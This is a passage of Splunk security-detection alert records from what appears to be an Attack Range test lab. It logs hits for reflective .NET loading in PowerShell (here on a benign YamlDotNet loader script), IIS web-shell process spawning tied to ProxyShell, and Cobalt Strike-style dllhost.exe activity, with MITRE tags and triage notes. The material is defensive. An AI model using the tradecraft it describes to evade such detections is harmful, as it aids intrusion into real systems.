Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664812532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T14:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T14:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664812532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T14:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T14:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664811831, search_name="ESCU - W3WP Spawning Shell - Rule", analyticstories="CISA AA22-257A", analyticstories="HAFNIUM Group", analyticstories="Hermetic Wiper", analyticstories="ProxyShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"HAFNIUM Group\", \"ProxyShell\", \"CISA AA22-257A\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-34473\", \"CVE-2021-34523\", \"CVE-2021-31207\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1505\", \"T1505.003\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="HAFNIUM Group", annotations.analytic_story="ProxyShell", annotations.analytic_story="CISA AA22-257A", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.cve="CVE-2021-34473", annotations.cve="CVE-2021-34523", annotations.cve="CVE-2021-31207", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1505", annotations.mitre_attack="T1505.003", count="96", dest="exchange01.attackrange.local", firstTime="2022-10-03T14:09:00", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T14:13:53", original_file_name="unknown", parent_process="unknown", process="unknown", process_name="cmd.exe", process_name="powershell.exe", risk_message="Possible Web Shell execution on exchange01.attackrange.local", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="This query identifies a shell, PowerShell.exe or Cmd.exe, spawning from W3WP.exe, or IIS. In addition to IIS logs, this behavior with an EDR product will capture potential webshell activity, similar to the HAFNIUM Group abusing CVEs, on publicly available Exchange mail servers. During triage, review the parent process and child process of the shell being spawned. Review the command-line arguments and any file modifications that may occur. Identify additional parallel process, child processes, that may highlight further commands executed. After triaging, work to contain the threat and patch the system that is vulnerable.", user="unknown" 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\SysWOW64\\dllhost.exe", process_id="6392", process_name="dllhost.exe", process_path="C:\\Windows\\SysWOW64\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\SysWOW64\\dllhost.exe", process_id="6088", process_name="dllhost.exe", process_path="C:\\Windows\\SysWOW64\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="5096", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="4904", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="24448", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="23912", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\SysWOW64\\dllhost.exe", process_id="23080", process_name="dllhost.exe", process_path="C:\\Windows\\SysWOW64\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="22508", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="21856", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="2", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="21832", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], 